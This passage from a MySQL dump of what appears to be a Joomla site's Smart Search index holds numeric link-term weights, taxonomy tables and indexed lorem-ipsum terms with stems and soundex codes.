),(110,29406,1.09669),(110,29407,1.07331),(110,29408,1.05),(110,29409,0.95669),(110,29410,1.02669),(126,29411,0.88669),(110,29411,2.66007),(110,29412,1.91338),(110,29413,1.07331),(110,29414,1.00331),(110,29415,1.12),(110,29416,0.91),(110,29417,0.98),(110,29418,0.91),(110,29419,1.00331),(120,29420,0.14),(126,29420,0.14),(110,29420,0.28),(112,29420,0.28),(110,29421,0.86331),(120,29421,0.86331),(126,29421,0.86331),(110,29422,1.00331),(110,29423,0.88669),(110,29424,1.02669),(112,29425,0.84),(110,29425,8.12),(110,29426,0.98),(110,29427,1.07331),(110,29428,1.09669),(110,29429,1.16669),(110,29430,0.98),(110,29431,1.05),(110,29432,1.07331),(110,29433,1.16669),(110,29434,1.00331),(110,29435,1.12),(110,29436,0.91),(110,29437,0.95669),(110,29438,1.00331),(110,29439,1.07331),(110,29440,0.98),(110,29441,1.05),(110,29442,0.95669),(110,29443,1.07331),(110,29444,0.93331),(112,29444,0.93331),(110,29445,1.12),(110,29446,0.91),(110,29447,1.05),(110,29448,1.86662),(110,29449,2.00662),(110,29450,0.95669),(110,29451,1.09669),(110,29452,0.93331),(110,29453,1.00331),(110,29454,1.00331),(110,29455,1.21331),(110,29456,0.98),(110,29457,1.28331),(110,29458,4.43345),(110,29459,0.93331),(110,29460,1.05),(110,29461,1.00331),(110,29462,0.95669),(110,29463,1.00331),(110,29464,1.07331),(110,29465,1.14331),(110,29466,0.98),(110,29467,1.05),(110,29468,0.91),(110,29469,1.07331),(110,29470,2.87007),(110,29471,3.08007),(110,29472,1.00331),(110,29473,1.12),(110,29474,0.37331),(110,29475,1.23669),(110,29476,1.4),(110,29477,0.65338),(110,29478,1.14331),(110,29479,1.26),(110,29480,1.09669),(110,29481,1.16669),(126,29482,0.32669),(110,29482,0.65338),(110,29483,1.02669),(110,29484,1.09669),(110,29485,1.00331),(110,29486,1.19),(110,29487,0.88669),(110,29488,1.00331),(110,29489,1.77338),(110,29490,1.02669),(110,29491,0.98),(110,29492,0.98),(110,29493,1.07331),(110,29494,1.02669),(110,29495,1.12),(110,29496,1.72662),(110,29497,0.95669),(110,29498,1.05),(110,29499,0.98),(110,29500,1.05),(110,29501,0.98),(110,29502,1.26),(110,29503,1.02669),(110,29504,1.02669),(110,29505,1.12),(110,29506,1.09669),(110,29507,1.07331),(110,29508,2.05338),(110,29509,1.19),(110,29510,0.88669),(110,29511,1.00331),(110,29512,0.93331),(110,29513,1.00331),(110,29514,0.95669),(110,29515,1.00331),(110,29516,2.1),(110,29517,2.24),(110,29518,0.93331),(110,29519,1.05),(110,29520,2.1),(110,29521,1.19),(110,29522,1.19),(110,29523,1.02669),(110,29524,1.19),(110,29525,1.12),(110,29526,1.23669),(110,29527,0.23331),(118,29527,0.23331),(110,29528,0.88669),(110,29529,1.16669),(110,29530,1.00331),(110,29531,1.21331),(110,29532,0.42),(110,29533,1.12),(110,29534,1.21331),(110,29535,1.21331),(110,29536,1.4),(110,29537,2.00662),(110,29538,2.14662),(110,29539,0.95669),(110,29540,1.05),(110,29541,0.93331),(110,29542,1.05),(111,32128,0.95669),(113,32128,0.95669),(128,32128,0.95669),(111,32129,1.02669),(113,32129,1.02669),(128,32129,1.02669),(112,33415,0.95669),(112,33416,0.84),(123,33416,0.84),(125,33416,0.84),(112,33417,1.09669),(112,33418,0.88669),(112,33419,1.05),(112,33420,1.02669),(112,33421,1.21331),(112,33422,0.93331),(112,33423,1.05),(112,33424,0.93331),(112,33425,1.05),(112,33426,0.98),(112,33427,1.07331),(112,33428,0.88669),(112,33429,1.02669),(112,33430,1.68),(112,33431,0.95669),(112,33432,0.84),(117,33432,0.84),(112,33433,0.98),(112,33434,0.93331),(112,33435,0.95669),(112,33436,1.07331),(112,33437,0.91),(112,33438,1.00331),(112,33439,0.95669),(112,33440,1.07331),(112,33441,0.88669),(112,33442,0.98),(112,33443,0.91),(112,33444,1.05),(112,33445,0.86331),(112,33446,0.95669),(112,33447,1.02669),(112,33448,0.81669),(112,33449,1.05),(112,33450,0.86331),(112,33451,0.98),(112,33452,1.05),(112,33453,0.95669),(112,33454,1.07331),(112,33455,0.95669),(112,33456,1.02669),(112,33457,0.98),(112,33458,0.95669),(112,33459,1.12),(112,33460,0.98),(112,33461,0.88669),(112,33462,0.98),(112,33463,1.00331),(112,33464,0.32669),(112,33465,0.93331),(112,33466,0.98),(113,35097,0.93324),(113,35098,1.05),(113,35099,1.12),(113,35100,0.88669),(113,35101,0.98),(113,35102,0.93331),(113,35103,1.00331),(113,35104,0.91),(113,35105,1.00331),(113,35106,0.98),(113,35107,0.95669),(113,35108,1.05),(113,35109,0.95669),(113,35110,1.02669),(113,35111,0.98),(113,35112,1.12),(113,35113,1.09669),(113,35114,0.93331),(113,35115,1.07331),(128,35116,1.68),(113,35116,2.94),(128,35117,1.02669),(113,35117,3.08007),(128,35118,1.16669),(113,35118,3.50007),(128,35119,1.05),(113,35119,3.15),(128,35120,1.21331),(113,35120,3.63993),(113,35121,1.02669),(113,35122,1.14331),(113,35123,1.09669),(113,35124,0.91),(113,35125,0.98),(113,35126,1.12),(113,35127,1.26),(113,35128,0.98),(113,35129,1.16669),(113,35130,1.00331),(113,35131,1.12),(113,35132,1.07331),(113,35133,1.14331),(113,35134,1.07331),(113,35135,0.98),(113,35136,1.21331),(113,35137,1.05),(113,35138,1.26),(113,35139,1.00331),(113,35140,1.09669),(113,35141,0.98),(113,35142,1.30669),(113,35143,1.07331),(113,35144,1.26),(113,35145,1.00331),(128,35145,1.00331),(113,35146,1.12),(113,35147,0.91),(113,35148,1.00331),(113,35149,1.02669),(113,35150,1.16669),(113,35151,0.95669),(128,35151,0.95669),(113,35152,1.12),(128,35152,1.12),(128,35153,1.72662),(113,35153,3.45324),(113,35154,1.05),(128,35155,1.05),(113,35155,2.1),(113,35156,1.00331),(128,35156,1.00331),(113,35157,0.95669),(113,35158,1.07331),(113,35159,1.86662),(113,35160,1.12),(113,35161,1.16669),(113,35162,0.93331),(113,35163,1.12),(128,35164,1.96),(113,35164,2.52),(113,35165,0.98),(113,35166,1.07331),(113,35167,1.02669),(128,35167,1.02669),(113,35168,1.19),(113,35169,0.95669),(113,35170,1.09669),(128,35171,1.96),(113,35171,2.94),(128,35172,2.28662),(113,35172,3.42993),(113,35173,1.02669),(113,35174,1.19),(113,35175,0.98),(113,35176,1.12),(113,35177,1.05),(128,35177,2.1),(113,35178,1.16669),(113,35179,0.28),(113,35180,1.00331),(113,35181,1.12),(113,35182,0.91),(113,35183,1.02669),(113,35184,0.91),(113,35185,1.05),(113,35186,0.93331),(113,35187,1.09669),(113,35188,0.91),(113,35189,0.95669),(113,35190,0.98),(113,35191,1.07331),(113,35192,1.91338),(113,35193,2.24),(113,35194,1.05),(113,35195,1.21331),(113,35196,0.98),(113,35197,1.09669),(113,35212,0.18669),(113,35213,0.91),(113,35214,1.05),(128,36920,0.69993),(125,36941,0.88669),(116,36970,0.91),(125,36982,0.91),(119,36984,0.23331),(116,37602,0.93331),(116,37603,0.84),(116,37604,1.00331),(116,37605,0.95669),(116,37606,0.84),(116,37607,1.07331),(116,37608,0.23331),(116,37609,0.91),(116,37610,1.12),(116,37611,0.93331),(116,37612,1.23669),(116,37613,1.16669),(116,37614,0.93331),(116,37615,1.05),(116,37616,1.16669),(116,37617,1.35331),(116,37618,0.98),(116,37619,1.23669),(116,37620,1.12),(116,37621,1.21331),(116,37622,0.95669),(116,37623,1.16669),(116,37624,0.37331),(125,37624,0.74662),(116,37625,0.95669),(116,37626,1.23669),(116,37627,0.86331),(116,37628,1.00331),(116,37629,0.93331),(116,37630,1.16669),(116,37631,1.02669),(116,37632,1.07331),(116,37633,1.02669),(116,37634,1.14331),(116,37635,0.98),(116,37636,1.00331),(116,37637,1.05),(116,37638,0.88669),(116,37639,0.98),(116,37640,0.93331),(128,37640,0.93331),(116,37641,1.09669),(116,37642,0.88669),(116,37643,1.05),(117,39003,0.93331),(117,39004,1.00331),(117,39005,1.07331),(117,39006,0.98),(117,39007,1.07331),(117,39008,0.88669),(117,39009,1.00331),(117,39010,0.88669),(117,39011,0.95669),(117,39012,0.18669),(117,39013,0.91),(117,39014,1.00331),(117,39015,0.98),(117,39016,1.05),(117,39017,0.18669),(117,39018,1.00331),(117,39019,1.09669),(117,39020,0.65338),(117,39021,2.14662),(117,39022,1.12),(117,39023,1.16669),(117,39024,0.93331),(117,39025,1.02669),(117,39026,0.95669),(117,39027,1.02669),(117,39028,0.95669),(117,39029,1.14331),(117,39030,0.95669),(117,39031,1.05),(117,39032,1.14331),(117,39033,0.95669),(117,39034,0.88669),(117,39035,0.95669),(117,39036,0.88669),(117,39037,1.00331),(117,39038,0.95669),(117,39039,1.02669),(117,39040,0.86331),(117,39041,0.95669),(117,39042,0.95669),(117,39043,1.09669),(117,39044,0.95669),(117,39045,1.12),(117,39046,0.98),(117,39047,0.98),(117,39048,1.05),(117,39049,1.14331),(117,39050,1.07331),(117,39051,1.00331),(117,39052,0.91),(117,39053,1.00331),(117,39054,0.98),(117,39055,1.12),(117,39056,0.88669),(117,39057,0.95669),(117,39058,0.91),(117,39059,1.00331),(117,39060,0.91),(117,39061,1.00331),(117,39062,0.93331),(117,39063,1.14331),(117,39064,0.98),(117,39065,1.16669),(117,39066,1.00331),(117,39067,0.28),(117,39068,1.05),(117,39069,1.19),(117,39070,0.95669),(117,39071,1.12),(117,39072,0.86331),(117,39073,0.93331),(117,39074,0.88669),(120,39074,0.88669),(117,39075,0.98),(117,39076,0.88669),(117,39077,1.09669),(117,39078,0.95669),(117,39079,1.05),(117,39080,0.23331),(134,39080,0.23331),(117,39081,0.98),(117,39082,1.09669),(118,39741,0.84),(118,39742,1.02669),(123,39743,0.23331),(120,39743,0.46662),(118,39743,0.93324),(118,39744,2.05338),(118,39745,1.19),(118,39746,1.21331),(118,39747,1.00331),(118,39748,1.09669),(118,39749,0.98),(118,39750,1.02669),(118,39751,1.30676),(118,39752,0.95669),(118,39753,1.05),(118,39754,1.07331),(118,39755,1.14331),(118,39756,0.98),(118,39757,1.05),(118,39758,0.95669),(118,39759,1.09669),(118,39760,0.84),(118,39761,0.91),(118,39762,1.00331),(118,39763,1.09669),(118,39764,0.93331),(118,39765,0.95669),(118,39766,1.14331),(118,39767,0.93331),(118,39768,1.02669),(118,39769,0.91),(118,39770,1.07331),(118,39771,0.88669),(118,39772,1.02669),(118,39773,0.86331),(118,39774,1.05),(118,39775,1.02669),(118,39776,0.93331),(118,39777,1.19),(118,39778,1.05),(118,39779,1.23669),(118,39780,0.95669),(118,39781,1.02669),(119,40967,0.93331),(119,40968,1.05),(119,40969,0.93331),(119,40970,1.05),(119,40971,0.88669),(119,40972,1.00331),(119,40973,0.32669),(119,40974,1.02669),(119,40975,1.12),(119,40976,0.95669),(119,40977,0.98),(119,40978,1.02669),(119,40979,1.07331),(119,40980,1.14331),(119,40981,0.98),(119,40982,1.05),(119,40983,0.84),(119,40984,0.91),(119,40985,0.91),(119,40986,1.00331),(119,40987,0.93331),(119,40988,1.09669),(119,40989,0.98),(119,40990,1.09669),(119,40991,2.00662),(119,40992,2.1),(119,40993,0.88669),(119,40994,1.16669),(119,40995,0.95669),(119,40996,1.02669),(119,40997,1.23669),(119,40998,1.00331),(119,40999,1.07331),(119,41000,0.88669),(119,41001,1.12),(119,41002,0.86331),(120,41002,1.72662),(119,41003,0.95669),(120,41003,0.95669),(119,41004,0.95669),(119,41005,0.88669),(126,41005,0.88669),(119,41006,0.98),(126,41006,0.98),(119,41007,1.02669),(119,41008,0.98),(119,41009,1.05),(119,41010,1.02669),(119,41011,1.12),(119,41012,1.00331),(119,41013,1.14331),(119,41014,0.95669),(119,41015,1.05),(119,41016,1.00331),(119,41017,1.14331),(119,41018,0.86331),(120,41018,0.86331),(119,41019,1.00331),(119,41020,0.91),(119,41021,0.98),(119,41022,0.86331),(119,41023,1.02669),(119,41024,0.88669),(119,41025,1.09669),(119,41026,0.88669),(119,41027,1.00331),(119,41028,0.98),(119,41029,1.09669),(119,41030,0.88669),(119,41031,0.98),(119,41032,0.95669),(119,41033,0.91),(119,41034,1.05),(119,41035,1.09669),(119,41036,1.30669),(119,41037,0.86331),(119,41038,0.91),(119,41039,0.93331),(119,41040,1.02669),(119,41041,0.91),(119,41042,1.14331),(119,41043,0.91),(119,41044,1.00331),(119,41045,0.28),(119,41046,1.05),(119,41047,1.23669),(119,41048,0.32669),(119,41049,0.98),(119,41050,1.12),(119,41051,0.32669),(119,41052,1.09669),(119,41053,1.19),(119,41054,0.37331),(119,41055,1.00331),(119,41056,1.12),(119,41057,0.88669),(119,41058,1.05),(120,42886,0.14),(125,42886,0.14),(120,42887,0.84),(120,42888,0.93331),(120,42889,0.93331),(120,42890,1.02669),(120,42891,0.88669),(120,42892,0.95669),(120,42893,0.98),(120,42894,0.93331),(120,42895,1.07331),(120,42896,0.88669),(120,42897,0.95669),(120,42898,0.98),(120,42899,1.05),(120,42900,0.91),(120,42901,1.00331),(120,42902,0.95669),(120,42903,1.09669),(120,42904,0.93331),(120,42905,1.09669),(120,42906,0.93331),(123,42906,0.93331),(120,42907,1.12),(120,42908,0.32669),(120,42909,0.93331),(120,42910,1.05),(120,42911,0.84),(120,42912,0.95669),(120,42913,0.93331),(120,42914,1.21331),(120,42915,1.05),(120,42916,1.12),(120,42917,0.95669),(120,42918,1.05),(120,42919,0.32669),(120,42920,1.07331),(120,42921,1.14331),(120,42922,0.42),(120,42923,1.07331),(120,42924,1.16669),(120,42925,0.91),(120,42926,0.98),(120,42927,0.86331),(120,42928,1.09669),(120,42929,0.95669),(120,42930,1.05),(120,42931,1.00331),(120,42932,1.07331),(120,42933,0.88669),(120,42934,1.05),(120,42935,1.00331),(120,42936,0.98),(120,42937,1.07331),(120,42938,0.91),(120,42939,1.09669),(120,42940,0.86331),(120,42941,0.93331),(120,42942,0.28),(128,42942,0.28),(120,42943,1.00331),(128,42943,1.00331),(120,42944,1.07331),(120,42945,0.84),(120,42946,1.02669),(120,42947,1.00331),(120,42948,1.12),(120,42949,0.98),(120,42950,0.88669),(120,42951,1.00331),(120,42952,0.91),(120,42953,1.14331),(120,42954,1.09669),(120,42955,0.95669),(120,42956,1.02669),(120,42957,0.86331),(120,42958,0.95669),(120,42959,0.93331),(120,42960,1.05),(120,42961,0.91),(120,42962,1.05),(120,42963,0.88669),(120,42964,1.16669),(120,42965,0.91),(120,42966,1.12),(120,42967,0.98),(120,42968,0.95669),(120,42969,1.05),(120,42970,0.91),(120,42971,1.02669),(120,42972,0.37331),(120,42973,1.00331),(120,42974,1.07331),(120,42975,0.95669),(120,42976,0.95669),(120,42977,1.12),(120,42978,1.00331),(120,42979,1.21331),(120,42980,0.93331),(120,42981,1.02669),(120,42982,1.07331),(120,42983,1.05),(120,42984,0.93331),(120,42985,0.93331),(120,42986,1.05),(120,42987,0.95669),(120,42988,1.02669),(120,42989,0.91),(120,42990,0.98),(120,42991,1.07331),(120,42992,0.88669),(120,42993,0.98),(120,42994,1.05),(120,42995,1.02669),(120,42996,0.91),(120,42997,1.02669),(120,42998,0.91),(120,42999,1.07331),(120,43000,0.93331),(120,43001,1.02669),(120,43002,0.32669),(120,43003,0.98),(120,43004,1.21331),(120,43005,1.12),(120,43006,1.21331),(121,43471,0.95669),(121,43472,1.09669),(121,43473,0.28),(121,43474,1.02669),(121,43475,1.09669),(123,45367,0.84),(123,45368,0.93331),(123,45369,0.93331),(123,45370,1.05),(123,45371,1.07331),(123,45372,1.02669),(123,45373,1.14331),(123,45374,0.93331),(123,45375,1.00331),(123,45376,1.86662),(123,45377,2.00662),(123,45378,1.00331),(123,45379,1.00331),(123,45380,1.09669),(123,45381,0.88669),(123,45382,0.98),(123,45383,1.00331),(123,45384,1.14331),(123,45385,1.02669),(123,45386,1.02669),(123,45387,1.19),(123,45388,0.95669),(123,45389,1.16669),(123,45390,1.00331),(123,45391,1.12),(123,45392,1.00331),(123,45393,1.14331),(123,45394,1.05),(123,45395,0.95669),(123,45396,1.02669),(123,45397,1.07331),(123,45398,1.14331),(126,47265,0.88669),(125,47313,0.18669),(125,48192,0.86331),(125,48193,0.98),(125,48194,0.37331),(125,48195,1.07331),(125,48196,1.16669),(125,48197,0.46669),(125,48198,1.05),(125,48199,1.19),(125,48200,0.32669),(125,48201,0.91),(125,48202,0.98),(125,48203,1.05),(125,48204,1.14331),(125,48205,0.28),(125,48206,1.02669),(125,48207,1.07331),(125,48208,0.98),(125,48209,1.00331),(125,48210,0.93331),(125,48211,0.98),(125,48212,0.84),(125,48213,1.00331),(125,48214,1.05),(125,48215,1.12),(125,48216,0.86331),(125,48217,0.93331),(125,48218,0.86331),(125,48219,1.05),(125,48220,0.95669),(125,48221,0.98),(125,48222,1.07331),(125,48223,0.95669),(125,48224,1.05),(125,48225,0.28),(125,48226,0.93331),(125,48227,0.98),(125,48228,0.86331),(125,48229,0.93331),(125,48230,0.88669),(125,48231,0.98),(125,48232,0.95669),(125,48233,0.93331),(125,48234,1.07331),(125,48235,1.00331),(125,48236,1.07331),(125,48237,0.98),(125,48238,1.14331),(125,48239,0.91),(125,48240,1.00331),(125,48241,0.23331),(125,48242,0.95669),(125,48243,1.02669),(125,48244,4.56321),(125,48245,1.07331),(125,48246,1.09669),(125,48247,0.18669),(125,48248,1.00331),(125,48249,1.21331),(125,48250,0.93331),(125,48251,1.07331),(125,48252,1.00331),(125,48253,1.14331),(125,48254,1.07331),(125,48255,1.12),(125,48256,0.86331),(125,48257,1.00331),(125,48258,0.93331),(125,48259,1.12),(125,48260,1.07331),(125,48261,1.14331),(125,48262,0.98),(126,49226,0.86331),(126,49227,0.93331),(126,49228,0.93331),(126,49229,1.05),(126,49230,0.37331),(126,49231,0.95669),(126,49232,1.00331),(126,49233,1.02669),(126,49234,1.19),(126,49235,0.93331),(126,49236,1.02669),(126,49237,0.88669),(126,49238,1.02669),(126,49239,0.32669),(126,49240,1.12),(126,49241,1.21331),(126,49242,0.91),(126,49243,1.14331),(126,49244,1.09669),(126,49245,0.95669),(126,49246,1.16669),(126,49247,1.09669),(126,49248,1.09669),(126,49249,1.07331),(126,49250,0.95669),(126,49251,1.07331),(126,49252,0.28),(126,49253,0.98),(126,49254,1.12),(126,49255,1.14331),(126,49256,1.02669),(126,49257,1.12),(126,49258,0.98),(126,49259,1.09669),(126,49260,0.91),(126,49261,0.98),(126,49262,1.00331),(126,49263,0.42),(126,49264,1.12),(126,49265,1.26),(126,49266,0.65338),(126,49267,1.05),(126,49268,1.12),(126,49269,1.07331),(126,49270,1.26),(126,49279,0.37331),(126,49280,0.98),(126,49281,1.23669),(128,51861,0.04669),(128,51862,0.77),(128,51863,0.81669),(128,51864,0.95669),(128,51865,1.12),(128,51866,0.98),(128,51867,1.19),(128,51868,1.00331),(128,51869,1.16669),(128,51870,1.00331),(128,51871,0.88669),(128,51872,1.07331),(128,51873,0.91),(128,51874,1.00331),(128,51875,1.07331),(128,51876,0.91),(128,51877,1.02669),(128,51878,1.07331),(128,51879,1.23669),(128,51880,1.07331),(128,51881,1.21331),(128,51882,0.37331),(128,51883,0.93331),(128,51884,1.02669),(128,51885,1.00331),(128,51886,1.16669),(128,51887,0.84),(128,51888,0.88669),(128,51889,0.98),(128,51890,1.00331),(128,51891,1.14331),(128,51892,0.91),(128,51893,1.05),(128,51894,0.93331),(128,51895,1.16669),(128,51896,0.86331),(128,51897,0.91),(128,51898,1.09669),(128,51899,1.07331),(128,51900,1.05),(128,51901,0.91),(128,51902,0.98),(128,51903,1.19),(128,51904,0.93331),(128,51905,1.02669),(128,51906,1.00331),(128,51907,1.19),(128,51908,1.12),(128,51909,1.16669),(128,51910,0.37331),(128,51911,0.95669),(128,51912,1.09669),(133,52568,0.28),(133,52569,1.09669),(133,52570,1.30669),(133,52571,1.02669),(133,52572,1.09669),(133,52573,0.46669),(133,52574,1.02669),(133,52575,1.21331),(133,52576,0.93331),(133,52577,1.02669),(134,52756,1.05),(134,52757,1.12),(134,52758,0.51331),(134,52759,1.16669),(134,52760,1.26),(134,52761,1.09669),(134,52762,1.26); /*!40000 ALTER TABLE `fit_finder_links_termsf` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_taxonomy` -- DROP TABLE IF EXISTS `fit_finder_taxonomy`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_taxonomy` ( `id` int(10) unsigned NOT NULL auto_increment, `parent_id` int(10) unsigned NOT NULL default '0', `title` varchar(255) NOT NULL, `state` tinyint(1) unsigned NOT NULL default '1', `access` tinyint(1) unsigned NOT NULL default '0', `ordering` tinyint(1) unsigned NOT NULL default '0', PRIMARY KEY (`id`), KEY `parent_id` (`parent_id`), KEY `state` (`state`), KEY `ordering` (`ordering`), KEY `access` (`access`), KEY `idx_parent_published` (`parent_id`,`state`,`access`) ) ENGINE=InnoDB AUTO_INCREMENT=25 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_taxonomy` -- LOCK TABLES `fit_finder_taxonomy` WRITE; /*!40000 ALTER TABLE `fit_finder_taxonomy` DISABLE KEYS */; INSERT INTO `fit_finder_taxonomy` VALUES (1,1,'Type',1,1,0),(2,1,'Contact',1,1,0),(3,1,'Category',1,1,0),(5,1,'Language',1,1,0),(7,1,'Region',1,1,0),(9,1,'Country',1,1,0),(11,3,'Pages',1,1,0),(12,5,'en-GB',1,1,0),(13,7,'State',1,1,0),(14,9,'Country',1,1,0),(15,1,'Article',1,1,0),(16,1,'Author',1,1,0),(17,16,'Super User',1,1,0),(19,3,'Sample Data-Articles',1,1,0),(20,16,'Joomla!',1,1,0),(21,3,'Joomla!',1,1,0),(22,3,'Oman',1,1,0),(23,3,'UAE',1,1,0),(24,3,'Typography',1,1,0); /*!40000 ALTER TABLE `fit_finder_taxonomy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_taxonomy_map` -- DROP TABLE IF EXISTS `fit_finder_taxonomy_map`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_taxonomy_map` ( `link_id` int(10) unsigned NOT NULL, `node_id` int(10) unsigned NOT NULL, PRIMARY KEY (`link_id`,`node_id`), KEY `link_id` (`link_id`), KEY `node_id` (`node_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_taxonomy_map` -- LOCK TABLES `fit_finder_taxonomy_map` WRITE; /*!40000 ALTER TABLE `fit_finder_taxonomy_map` DISABLE KEYS */; INSERT INTO `fit_finder_taxonomy_map` VALUES (2,2),(2,11),(2,12),(2,13),(2,14),(3,11),(3,12),(3,15),(3,17),(5,12),(5,15),(5,17),(5,19),(9,12),(9,15),(9,20),(9,21),(20,12),(20,15),(20,17),(20,22),(21,12),(21,15),(21,17),(21,22),(22,12),(22,15),(22,17),(22,22),(23,12),(23,15),(23,17),(23,23),(24,12),(24,15),(24,17),(24,23),(25,12),(25,15),(25,17),(25,23),(35,11),(35,12),(35,15),(35,17),(40,12),(40,15),(40,17),(40,19),(52,12),(52,15),(52,17),(52,19),(55,12),(55,15),(55,17),(55,19),(58,12),(58,15),(58,17),(58,19),(68,12),(68,15),(68,17),(68,19),(77,12),(77,15),(77,17),(77,23),(103,12),(103,15),(103,17),(103,23),(104,12),(104,15),(104,17),(104,23),(105,12),(105,15),(105,17),(105,23),(106,12),(106,15),(106,17),(106,23),(107,12),(107,15),(107,17),(107,23),(109,12),(109,15),(109,17),(109,23),(110,12),(110,15),(110,17),(110,23),(111,12),(111,15),(111,17),(111,23),(112,12),(112,15),(112,17),(112,23),(113,12),(113,15),(113,17),(113,19),(114,12),(114,15),(114,17),(114,23),(116,12),(116,15),(116,17),(116,19),(117,12),(117,15),(117,17),(117,19),(118,11),(118,12),(118,15),(118,17),(119,12),(119,15),(119,17),(119,24),(120,11),(120,12),(120,15),(120,17),(121,12),(121,15),(121,17),(121,19),(123,12),(123,15),(123,17),(123,19),(125,12),(125,15),(125,17),(125,19),(126,12),(126,15),(126,17),(126,19),(128,12),(128,15),(128,20),(128,21),(129,12),(129,15),(129,17),(129,19),(130,12),(130,15),(130,17),(130,19),(133,12),(133,15),(133,17),(133,19),(134,12),(134,15),(134,17),(134,23); /*!40000 ALTER TABLE `fit_finder_taxonomy_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_terms` -- DROP TABLE IF EXISTS `fit_finder_terms`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_terms` ( `term_id` int(10) unsigned NOT NULL auto_increment, `term` varchar(75) NOT NULL, `stem` varchar(75) NOT NULL, `common` tinyint(1) unsigned NOT NULL default '0', `phrase` tinyint(1) unsigned NOT NULL default '0', `weight` float unsigned NOT NULL default '0', `soundex` varchar(75) NOT NULL, `links` int(10) NOT NULL default '0', `language` char(3) NOT NULL default '', PRIMARY KEY (`term_id`), UNIQUE KEY `idx_term` (`term`), KEY `idx_term_phrase` (`term`,`phrase`), KEY `idx_stem_phrase` (`stem`,`phrase`), KEY `idx_soundex_phrase` (`soundex`,`phrase`) ) ENGINE=InnoDB AUTO_INCREMENT=52764 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_terms` -- LOCK TABLES `fit_finder_terms` WRITE; /*!40000 ALTER TABLE `fit_finder_terms` DISABLE KEYS */; INSERT INTO `fit_finder_terms` VALUES (23,'1','1',0,0,0.1,'',8,'en'),(24,'9','9',0,0,0.1,'',3,'en'),(25,'contact','contact',0,0,0.4667,'C5323',1,'en'),(26,'contact us','contact us',0,1,1.3333,'C53232',1,'en'),(27,'contact us page','contact us page',0,1,1.5,'C5323212',1,'en'),(28,'country','countri',0,0,0.4667,'C536',2,'en'),(29,'en-gb','en-gb',0,0,0.3333,'E521',42,'en'),(30,'index','index',0,0,0.3333,'I532',42,'en'),(31,'name','name',0,0,0.2667,'N000',2,'en'),(32,'page','page',1,0,0.0333,'P200',2,'en'),(33,'page 1','page 1',0,1,1.2,'P200',2,'en'),(34,'pages','page',0,0,0.3333,'P200',15,'en'),(35,'state','state',0,0,0.3333,'S300',3,'en'),(36,'us','us',0,0,0.1333,'U200',6,'en'),(37,'us page','us page',0,1,1.2333,'U212',1,'en'),(38,'us page 1','us page 1',0,1,1.3,'U212',1,'en'),(39,'85','85',0,0,0.2,'',2,'en'),(40,'ac','ac',0,0,0.1333,'A200',1,'en'),(41,'ac duis','ac duis',0,1,1.2333,'A232',1,'en'),(42,'ac duis iaculis','ac duis iaculis',0,1,1.5,'A23242',1,'en'),(43,'ac faucibus','ac faucibus',0,1,1.3667,'A21212',1,'en'),(44,'ac faucibus magna','ac faucibus magna',0,1,1.5667,'A21212525',1,'en'),(45,'adipiscing','adipisc',0,0,0.6667,'A31252',1,'en'),(46,'adipiscing elit','adipisc elit',0,1,1.5,'A3125243',1,'en'),(47,'adipiscing elit fusce','adipisc elit fusce',0,1,1.7,'A312524312',1,'en'),(48,'adipiscing sed','adipisc sed',0,1,1.4667,'A312523',1,'en'),(49,'adipiscing sed ut','adipisc sed ut',0,1,1.5667,'A312523',1,'en'),(50,'aenean','aenean',0,0,0.4,'A500',1,'en'),(51,'aenean sit','aenean sit',0,1,1.3333,'A523',1,'en'),(52,'aenean sit amet','aenean sit amet',0,1,1.5,'A52353',1,'en'),(53,'aliquam','aliquam',0,0,0.4667,'A425',1,'en'),(54,'aliquam imperdiet','aliquam imperdiet',0,1,1.5667,'A425163',1,'en'),(55,'aliquam imperdiet elit','aliquam imperdiet elit',0,1,1.7333,'A42516343',1,'en'),(56,'aliquet','aliquet',0,0,0.4667,'A423',1,'en'),(57,'aliquet sed','aliquet sed',0,1,1.3667,'A42323',1,'en'),(58,'aliquet sed scelerisque','aliquet sed scelerisque',0,1,1.7667,'A423232462',1,'en'),(59,'amet','amet',0,0,0.2667,'A530',1,'en'),(60,'amet consectetur','amet consectetur',0,1,1.5333,'A5325236',1,'en'),(61,'amet consectetur adipiscing','amet consectetur adipiscing',0,1,1.9,'A532523631252',1,'en'),(62,'amet diam','amet diam',0,1,1.3,'A535',1,'en'),(63,'amet diam hendrerit','amet diam hendrerit',0,1,1.6333,'A535363',1,'en'),(64,'amet lectus','amet lectus',0,1,1.3667,'A534232',1,'en'),(65,'amet lectus donec','amet lectus donec',0,1,1.5667,'A534232352',1,'en'),(66,'amet massa','amet massa',0,1,1.3333,'A5352',1,'en'),(67,'amet massa convallis','amet massa convallis',0,1,1.6667,'A53525142',1,'en'),(68,'amet tempus','amet tempus',0,1,1.3667,'A53512',1,'en'),(69,'amet tempus nunc','amet tempus nunc',0,1,1.5333,'A5351252',1,'en'),(70,'article','articl',0,0,0.4667,'A6324',41,'en'),(71,'at','at',1,0,0.0167,'A300',18,'en'),(72,'at purus','at purus',0,1,1.2667,'A3162',1,'en'),(73,'at purus quis','at purus quis',0,1,1.4333,'A3162',1,'en'),(74,'at tincidunt','at tincidunt',0,1,1.4,'A352353',1,'en'),(75,'at tincidunt praesent','at tincidunt praesent',0,1,1.7,'A35235316253',1,'en'),(76,'at varius','at varius',0,1,1.3,'A3162',1,'en'),(77,'at varius est','at varius est',0,1,1.4333,'A31623',1,'en'),(78,'auctor','auctor',0,0,0.4,'A236',1,'en'),(79,'auctor aliquet','auctor aliquet',0,1,1.4667,'A236423',1,'en'),(80,'auctor aliquet sed','auctor aliquet sed',0,1,1.6,'A23642323',1,'en'),(81,'blandit','blandit',0,0,0.4667,'B453',1,'en'),(82,'blandit donec','blandit donec',0,1,1.4333,'B45352',1,'en'),(83,'blandit donec nec','blandit donec 